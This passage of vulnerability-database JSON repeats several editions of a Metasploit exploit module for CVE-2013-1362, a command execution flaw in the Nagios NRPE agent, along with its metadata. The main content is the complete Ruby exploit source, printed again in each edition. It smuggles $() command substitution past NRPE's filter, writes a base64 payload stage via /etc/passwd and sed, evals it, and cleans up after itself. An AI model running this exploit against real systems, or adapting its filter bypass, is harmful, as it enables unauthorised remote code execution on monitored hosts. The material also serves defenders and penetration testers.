"https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2017-11-01T09:38:44", "differentElements": ["modified", "published"], "edition": 8}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2017-11-01T13:38:45", "history": [], "viewCount": 16, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2017-11-01T13:38:45", "differentElements": ["modified", "published"], "edition": 9}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2017-11-02T19:40:23", "history": [], "viewCount": 16, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2017-11-02T19:40:23", "differentElements": ["modified", "published"], "edition": 10}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2017-11-02T21:37:09", "history": [], "viewCount": 16, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2017-11-02T21:37:09", "differentElements": ["modified", "published"], "edition": 11}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2017-11-09T13:37:56", "history": [], "viewCount": 16, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2017-11-09T13:37:56", "differentElements": ["modified", "published"], "edition": 12}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2017-11-09T15:39:13", "history": [], "viewCount": 16, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's 